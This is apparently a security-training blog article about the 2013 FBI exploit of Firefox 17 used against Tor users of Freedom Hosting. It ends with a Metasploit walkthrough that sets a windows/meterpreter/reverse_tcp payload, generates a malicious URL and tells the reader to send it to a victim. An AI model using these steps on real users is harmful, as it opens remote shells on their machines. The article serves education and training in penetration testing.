The FBI TOR Exploit

November 29, 2013 by

The Tor network is an anonymizing network that allows people to browse the web and access other services without being traced. As part of this network, there is the so-called "darknet," servers accessible only through Tor, which host a variety of services from forums to e-mail.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

It does this by directing Internet traffic through a volunteer network of more than 3,000 relays to conceal the user's location. While many of these services are innocent and aimed at those concerned about human rights abuses, the anonymity naturally attracts those with criminal intent such as the distribution of child pornography. It's then impossible for law enforcement agencies to trace the original IP address.

The Story Behind FBI and the TOR Exploit

Eric Eoin Marques, a US-born 28-year-old living in Dublin, Ireland, is accused of being the chief architect behind Freedom Hosting, which is responsible for hosting child porn on 550 servers throughout Europe.

Freedom Hosting is a major hidden services hosting provider that can only be accessed through the Tor network.

Freedom Hosting and Marques have been associated with child pornography, so Tor released a statement claiming that they are in no way associated with the people running Freedom Hosting:

"The person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research. In the past, adversarial organizations have skipped trying to break Tor hidden services and instead attacked the software running at the server behind the dot onion address. Exploits for PHP, Apache, MySQL, and other software are far more common than exploits for Tor. The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of JavaScript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user's computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor browser is based. We're investigating these bugs and will fix them if we can," Tor said in a statement.

The FBI used a vulnerability in Firefox 17, on which the Tor browser is based, to turn Freedom Hosting sites into malware spreading tracker tools. It all works on the Firefox 17 JavaScript Zero Day Exploit; this malicious script is a tiny Windows executable hidden variable named "Magneto" which looks for victim's MAC address and its hostname and sends it back as a HTTP web request to the Virginia server to expose the user's real IP address. The FBI successfully gained access to the Freedom Hosting server and injected malicious HTML code, which checks whether the user's browser is Firefox 17 or not.

Firefox onreadystatechange Event DocumentViewerImpl Use After Free

Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.

This module exploits a vulnerability found on Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.


Launch terminal, run msfconsole, and type in use


Next type in show options to check all the available options for this exploit:

As we can see in the above figure, there are some options for this exploit. Now we can see here that the options that are required are showing "yes ." The first option is SRVHOST, which refers to the server host address; it means we have to set our local machine address here. The second option is SRVPORT; since the server port address is showing 8080, this means that port no.8080 must be enabled to successfully run this module.

Let us set the all required options type in set SRVHOST

Now we are going to set a payload in this exploit. So type in set PAYLOAD windows/meterpreter/reverse_tcp:

Now again type in show options to check all the options for the exploit and whether the payload is set or not. Here we can see that our exploit's options are set and our payload's option needs to be set.

So type in set LHOST

Now we are ready to run this module; type in run:

Now we can see in the above figure that, after running the run command, a malicious URL is generated in msfconsole. Now what we have to do just pass this URL to the victim.

If the victim is using the vulnerable version of Mozilla Firefox, we will get this type of screen and the victim is compromised:





Become a Certified Ethical Hacker, guaranteed!

Become a Certified Ethical Hacker, guaranteed!

Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.



Warlock works as a Information Security Professional. He has quite a few global certifications to his name such as CEH, CHFI, OSCP and ISO 27001 Lead Implementer. He has experience in penetration testing, social engineering, password cracking and malware obfuscation. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.